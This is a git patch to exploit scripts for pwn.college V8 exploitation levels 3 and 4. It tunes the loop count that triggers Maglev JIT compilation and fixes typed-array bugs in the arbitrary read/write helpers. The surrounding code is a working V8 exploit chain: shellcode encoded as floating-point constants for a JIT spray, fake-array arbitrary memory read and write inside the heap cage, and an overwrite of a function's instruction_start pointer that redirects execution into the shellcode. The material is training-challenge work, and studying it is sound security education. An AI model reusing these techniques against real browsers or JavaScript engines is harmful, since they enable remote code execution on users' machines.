From 90245c7091bbadddd34ad72643bad98acf0e729a Mon Sep 17 00:00:00 2001 From: Jack Ren Date: Sun, 15 Sep 2024 08:57:29 +0800 Subject: [PATCH] Minor Changes to Level 3 & 4 of PwnCollegeV8Exploitation 1. The threshold to trigger MAGLEV compilation is different when gdb is attached to d8 or not. - When gdb attached to d8, the training loop count to trigger MAGLEV is 100,000. - But when the standalone d8 running, the training loop count to trigger MAGLEV is only 10,000. If you still use 100,000, it will trigger TURBOFAN then code data structure will change and shellcode execution fails. 2. Fixed other miscellaneous minor mistakes. --- JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js | 11 +++++------ JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js | 11 +++++------ 2 files changed, 10 insertions(+), 12 deletions(-) diff --git a/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js index f9c9337..37340b7 100644 --- a/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js +++ b/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js @@ -36,7 +36,7 @@ function shellcode() { // Promote to ensure not GC during training // JIT spray machine code form of `execve("catflag", NULL, NULL)` return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61]; } -for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation +for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation // Create a PACKED_DOUBLE_ELEMENTS array contains faked PACKED_DOUBLE_ELEMENTS array // map, properties, elements, length --- first three field are static roots @@ -64,7 +64,7 @@ function ArbWrite64(cage_addr, value) { // int32, bigint arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000); let written = b2f(value); fakearr[0] = written; - console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`); + console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`); } // ArbRead64(0xfffffff0); @@ -74,16 +74,17 @@ function ArbWrite64(cage_addr, value) { // int32, bigint function ArbRead32(cage_addr) { // int32 -> int32 if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); bi64a[0] = ArbRead64(cage_addr & 0xfffffff8); - let result = si32a[(cage_addr & 0x4) >> 2]; + let result = i32a[(cage_addr & 0x4) >> 2]; console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`); return result; } +// DWORD Aligned function ArbWrite32(cage_addr, value) { // int32, int32 -> void if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8; bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr); - si32a[(cage_addr & 0x4) >> 2] = value; + i32a[(cage_addr & 0x4) >> 2] = value; ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]); console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`); } @@ -101,5 +102,3 @@ let instruction_start = ArbRead32(instruction_start_addr); console.log("instruction_start: " + instruction_start.toString(16)); ArbWrite32(instruction_start_addr, instruction_start + 0x6B); shellcode(); - -// Due to heap fengshui, the possibility of getting flag by running exploit once is 1/10 \ No newline at end of file diff --git a/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js index a10f78c..bc26401 100644 --- a/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js +++ b/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js @@ -35,7 +35,7 @@ function shellcode() { // Promote to ensure not GC during training // JIT spray machine code form of `execve("catflag", NULL, NULL)` return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61]; } -for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation +for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation let placeholder = {}; let corrupt_arr = [2.30234590962020889586281057477E-320]; @@ -85,23 +85,24 @@ function ArbWrite64(cage_addr, value) { // int32, bigint corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002); let written = b2f(value); double_arr[0] = written; - console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`); + console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`); } // DWORD Aligned function ArbRead32(cage_addr) { // int32 -> int32 if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); bi64a[0] = ArbRead64(cage_addr & 0xfffffff8); - let result = si32a[(cage_addr & 0x4) >> 2]; + let result = i32a[(cage_addr & 0x4) >> 2]; console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`); return result; } +// DWORD Aligned function ArbWrite32(cage_addr, value) { // int32, int32 -> void if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8; bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr); - si32a[(cage_addr & 0x4) >> 2] = value; + i32a[(cage_addr & 0x4) >> 2] = value; ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]); console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`); } @@ -115,5 +116,3 @@ let instruction_start = ArbRead32(instruction_start_addr); console.log("instruction_start: " + instruction_start.toString(16)); ArbWrite32(instruction_start_addr, instruction_start + 0x6B); shellcode(); - -// the possibility of getting flag by running exploit once is 1/10 \ No newline at end of file